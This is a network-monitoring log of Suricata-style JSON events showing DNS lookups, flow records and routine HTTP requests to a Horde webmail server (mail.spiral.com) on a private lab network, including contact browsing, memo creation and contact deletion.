{"timestamp":"2020-02-29T00:14:46.043430+0000","flow_id":345417056692646,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41179,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":41844,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:14:46.152344+0000","flow_id":345417056692646,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41179,"proto":"UDP","dns":{"type":"answer","id":41844,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:14:46.152344+0000","flow_id":345417056692646,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41179,"proto":"UDP","dns":{"type":"answer","id":41844,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:14:46.216976+0000","flow_id":1918758066486106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34834,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3979}} {"timestamp":"2020-02-29T00:14:47.000556+0000","flow_id":489251210174079,"event_type":"flow","src_ip":"192.168.10.130","src_port":34814,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":11,"bytes_toserver":1295,"bytes_toclient":8193,"start":"2020-02-29T00:13:10.761471+0000","end":"2020-02-29T00:13:46.260707+0000","age":36,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:14:49.035557+0000","flow_id":30355435553035,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52758,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:14:49.044164+0000","flow_id":7712368340100,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":44069,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":15118,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:14:49.152103+0000","flow_id":7712368340100,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44069,"proto":"UDP","dns":{"type":"answer","id":15118,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:14:49.152103+0000","flow_id":7712368340100,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44069,"proto":"UDP","dns":{"type":"answer","id":15118,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:14:49.301564+0000","flow_id":30355435553035,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52758,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20}} {"timestamp":"2020-02-29T00:14:49.301564+0000","flow_id":30355435553035,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52758,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":198,"tx_id":1}} {"timestamp":"2020-02-29T00:14:49.316701+0000","flow_id":2108866204128541,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51339,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":25357,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:14:49.421564+0000","flow_id":2108866204128541,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51339,"proto":"UDP","dns":{"type":"answer","id":25357,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:14:49.421564+0000","flow_id":2108866204128541,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51339,"proto":"UDP","dns":{"type":"answer","id":25357,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:14:49.540560+0000","flow_id":30355435553035,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52758,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5677}} {"timestamp":"2020-02-29T00:14:50.000198+0000","event_type":"stats","stats":{"uptime":14542,"capture":{"kernel_packets":135743,"kernel_drops":0},"decoder":{"pkts":135756,"bytes":93455039,"invalid":188,"ipv4":134249,"ipv6":8,"ethernet":135756,"raw":0,"null":0,"sll":0,"tcp":128910,"udp":5136,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098208},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2783,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2799,"synack":2790,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1822,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2347,"failed_udp":112},"tx":{"http":4678,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2427}},"flow_mgr":{"closed_pruned":2764,"new_pruned":15,"est_pruned":2389,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":24131,"memcap_state":0,"memcap_global":0},"http":{"memuse":105616,"memcap":0}}} {"timestamp":"2020-02-29T00:14:50.001602+0000","flow_id":1254571419460852,"event_type":"flow","src_ip":"192.168.10.122","src_port":45436,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:09:49.091380+0000","end":"2020-02-29T00:09:49.199155+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:14:51.217864+0000","flow_id":1918758066486106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34834,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3979},"app_proto":"http","fileinfo":{"filename":"\/turba\/","state":"CLOSED","stored":false,"size":19145,"tx_id":0}} {"timestamp":"2020-02-29T00:14:52.000425+0000","flow_id":36578839428506,"event_type":"flow","src_ip":"192.168.10.130","src_port":34822,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":11,"bytes_toserver":1297,"bytes_toclient":8197,"start":"2020-02-29T00:13:46.261530+0000","end":"2020-02-29T00:13:51.621886+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:14:52.729829+0000","flow_id":1936470511985381,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49156,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":872,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:14:52.835054+0000","flow_id":1936470511985381,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49156,"proto":"UDP","dns":{"type":"answer","id":872,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:14:52.835054+0000","flow_id":1936470511985381,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49156,"proto":"UDP","dns":{"type":"answer","id":872,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:14:52.981007+0000","flow_id":1847126602345263,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34836,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/turba\/browse.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5092}} {"timestamp":"2020-02-29T00:14:53.002720+0000","flow_id":280640340632148,"event_type":"flow","src_ip":"192.168.10.122","src_port":52733,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:09:52.533076+0000","end":"2020-02-29T00:09:52.641396+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:14:54.541786+0000","flow_id":30355435553035,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52758,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5677},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/list.php","state":"CLOSED","stored":false,"size":29738,"tx_id":2}} {"timestamp":"2020-02-29T00:14:55.960466+0000","flow_id":1847126602345263,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34836,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/browse.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5092},"app_proto":"http","fileinfo":{"filename":"\/turba\/browse.php","state":"CLOSED","stored":false,"size":27259,"tx_id":0}} {"timestamp":"2020-02-29T00:14:55.970053+0000","flow_id":1364947804081477,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35285,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":37041,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:14:56.074979+0000","flow_id":1364947804081477,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35285,"proto":"UDP","dns":{"type":"answer","id":37041,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:14:56.074979+0000","flow_id":1364947804081477,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35285,"proto":"UDP","dns":{"type":"answer","id":37041,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:14:56.602528+0000","flow_id":1847126602345263,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34836,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=5vmPLSQuRAd-p6FI4ND2V1R","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/browse.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":20683}} {"timestamp":"2020-02-29T00:14:57.000627+0000","event_type":"stats","stats":{"uptime":14549,"capture":{"kernel_packets":135801,"kernel_drops":0},"decoder":{"pkts":135801,"bytes":93472586,"invalid":188,"ipv4":134294,"ipv6":8,"ethernet":135801,"raw":0,"null":0,"sll":0,"tcp":128948,"udp":5143,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098784},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2784,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2800,"synack":2791,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1823,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2351,"failed_udp":112},"tx":{"http":4682,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2431}},"flow_mgr":{"closed_pruned":2765,"new_pruned":15,"est_pruned":2391,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":24132,"memcap_state":0,"memcap_global":0},"http":{"memuse":155319,"memcap":0}}} {"timestamp":"2020-02-29T00:15:01.606087+0000","flow_id":1847126602345263,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34836,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=5vmPLSQuRAd-p6FI4ND2V1R","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/browse.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":20683},"app_proto":"http","fileinfo":{"filename":"\/turba\/contact.php","state":"TRUNCATED","stored":false,"size":106496,"tx_id":1}} {"timestamp":"2020-02-29T00:15:04.000225+0000","flow_id":218925971392270,"event_type":"flow","src_ip":"192.168.10.81","src_port":52754,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":15,"pkts_toclient":16,"bytes_toserver":1974,"bytes_toclient":15190,"start":"2020-02-29T00:13:53.116494+0000","end":"2020-02-29T00:14:02.767022+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:15:04.000274+0000","event_type":"stats","stats":{"uptime":14556,"capture":{"kernel_packets":135832,"kernel_drops":0},"decoder":{"pkts":135834,"bytes":93495893,"invalid":188,"ipv4":134327,"ipv6":8,"ethernet":135834,"raw":0,"null":0,"sll":0,"tcp":128980,"udp":5144,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098784},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2784,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2800,"synack":2791,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1823,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2351,"failed_udp":112},"tx":{"http":4682,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2431}},"flow_mgr":{"closed_pruned":2765,"new_pruned":15,"est_pruned":2391,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":24132,"memcap_state":0,"memcap_global":0},"http":{"memuse":2119,"memcap":0}}} {"timestamp":"2020-02-29T00:15:06.000144+0000","flow_id":1338237383344368,"event_type":"flow","src_ip":"192.168.10.122","src_port":52542,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:04.262384+0000","end":"2020-02-29T00:10:04.370921+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:08.716126+0000","flow_id":347324023631198,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49690,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":9874,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:15:08.826187+0000","flow_id":347324023631198,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49690,"proto":"UDP","dns":{"type":"answer","id":9874,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:15:08.826187+0000","flow_id":347324023631198,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49690,"proto":"UDP","dns":{"type":"answer","id":9874,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:08.909028+0000","flow_id":422730764433898,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34838,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/turba\/delete.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=5vmPLSQuRAd-p6FI4ND2V1R","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/turba\/search.php","length":20}} {"timestamp":"2020-02-29T00:15:08.909028+0000","flow_id":422730764433898,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34838,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/delete.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=5vmPLSQuRAd-p6FI4ND2V1R","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/turba\/search.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/turba\/delete.php","state":"CLOSED","stored":false,"size":77,"tx_id":0}} {"timestamp":"2020-02-29T00:15:08.930159+0000","flow_id":376680125051247,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34528,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":40775,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:15:09.000182+0000","flow_id":23809887247118,"event_type":"flow","src_ip":"192.168.10.122","src_port":58586,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:07.203534+0000","end":"2020-02-29T00:10:07.311742+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:09.000397+0000","flow_id":691737431344368,"event_type":"flow","src_ip":"192.168.10.122","src_port":45470,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:07.034032+0000","end":"2020-02-29T00:10:07.142311+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:09.038527+0000","flow_id":376680125051247,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34528,"proto":"UDP","dns":{"type":"answer","id":40775,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:15:09.038527+0000","flow_id":376680125051247,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34528,"proto":"UDP","dns":{"type":"answer","id":40775,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:09.109992+0000","flow_id":422730764433898,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34838,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/search.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=5vmPLSQuRAd-p6FI4ND2V1R","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4067}} {"timestamp":"2020-02-29T00:15:09.186121+0000","flow_id":1067809082562313,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34810,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":37474,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:15:09.294351+0000","flow_id":1067809082562313,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34810,"proto":"UDP","dns":{"type":"answer","id":37474,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:15:09.294351+0000","flow_id":1067809082562313,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34810,"proto":"UDP","dns":{"type":"answer","id":37474,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:09.486294+0000","flow_id":2078036930179823,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34840,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6990}} 